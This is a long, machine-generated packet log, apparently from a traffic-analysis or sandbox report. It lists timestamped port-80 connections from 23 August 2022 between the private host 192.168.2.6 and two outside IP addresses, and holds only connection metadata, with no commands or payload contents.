                                                                                                                                                                      Aug 23, 2022 18:26:26.259191990 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.259795904 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.306515932 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.306566954 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.306624889 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.306668997 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.306693077 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.306740999 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.306760073 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.306785107 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.306843042 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.306879997 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.306921005 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.306957006 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.306996107 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.307019949 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.307071924 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.307110071 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.307133913 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.307193995 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.307218075 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.307265997 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.307615042 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307640076 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307645082 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307648897 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307651997 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307656050 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307658911 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307662964 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307666063 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307670116 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307672977 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307676077 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307679892 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307683945 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307687044 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307689905 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307693958 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307697058 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.307699919 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:26.354850054 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:26.355477095 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:27.887972116 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:27.888097048 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:30.932075024 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:30.966671944 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.058702946 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.058742046 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.058758974 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.058810949 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.058830976 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.058849096 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.058893919 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.058933020 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.058948994 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.058978081 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.059007883 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.064146042 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.064181089 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.064198971 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.064251900 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.064270973 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.092684031 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.092720032 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.092740059 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.092753887 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.092770100 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.092788935 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.092799902 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.092808008 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.092828989 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.092879057 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.092890024 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.092909098 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.092926979 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.092938900 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.092943907 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.092962027 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.092974901 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.092979908 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.092998981 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.093009949 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.093089104 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.098222017 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.098253965 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.098274946 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.098294973 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.098315954 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.098326921 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.098346949 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.098359108 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.098360062 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.098402977 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.098414898 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.126821041 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.126883030 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.126959085 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.126959085 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.126996040 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127023935 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127043009 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127052069 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127080917 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127087116 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127113104 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127142906 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127223015 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127255917 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127274990 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127285004 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127298117 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127316952 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127326012 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127343893 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127367020 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127403975 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127424955 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127454042 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127468109 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127485037 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127495050 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127515078 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127530098 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127566099 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127566099 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127608061 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127650023 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127691031 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127698898 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127744913 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.127851963 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127878904 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.127960920 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.128114939 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.128153086 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.128165960 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.128190041 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.128200054 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.128218889 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.128242970 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.128254890 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.128262043 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.128285885 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.128300905 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.128324986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.128325939 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.128364086 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.132069111 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.132107019 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.132133961 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.132139921 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.132165909 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.132169008 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.132184982 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.132194996 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.132205009 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.132226944 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.132239103 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.132257938 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.132268906 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.132287979 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.132317066 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.132328987 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.132348061 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.132358074 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.132364035 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.132376909 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.132405996 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.132421017 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.132447004 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.168775082 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.168817997 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.168838024 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.168854952 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.168857098 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.168874025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.168885946 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.168894053 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.168895960 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.168912888 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.168929100 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.168931007 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.168950081 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.168957949 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.168971062 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.168982983 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.168991089 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169009924 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169017076 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169029951 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169045925 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169049978 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169070005 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169073105 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169087887 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169100046 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169106960 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169116974 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169126034 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169135094 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169145107 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169152975 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169163942 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169171095 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169188976 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169203997 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169239998 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169258118 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169286013 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169297934 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169435978 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169455051 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169473886 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169481039 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169492960 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169497013 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169514894 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169531107 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169656992 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169687986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169701099 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169727087 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169899940 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169920921 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.169951916 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.169965982 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170183897 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170203924 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170232058 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170241117 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170250893 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170257092 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170277119 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170286894 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170298100 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170320034 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170327902 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170358896 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170413017 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170433998 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170463085 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170502901 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170521021 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170542002 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170551062 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170567036 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170567036 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170588017 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170608044 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170609951 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170627117 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170628071 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170644045 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170672894 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170692921 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170713902 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170732975 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170736074 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170754910 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170758009 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170777082 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170803070 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170826912 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170845032 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170872927 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170888901 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170913935 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170933962 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170957088 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.170968056 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170988083 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.170990944 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.171021938 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.171026945 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.171041965 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.171066046 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.171098948 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.172107935 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.172137976 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.172158003 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.172166109 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.172173977 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.172184944 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.172202110 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.172219038 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.187679052 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.187715054 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.187733889 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.187753916 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.187772989 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.187784910 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.187793016 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.187808037 CEST4980080192.168.2.645.95.11.158
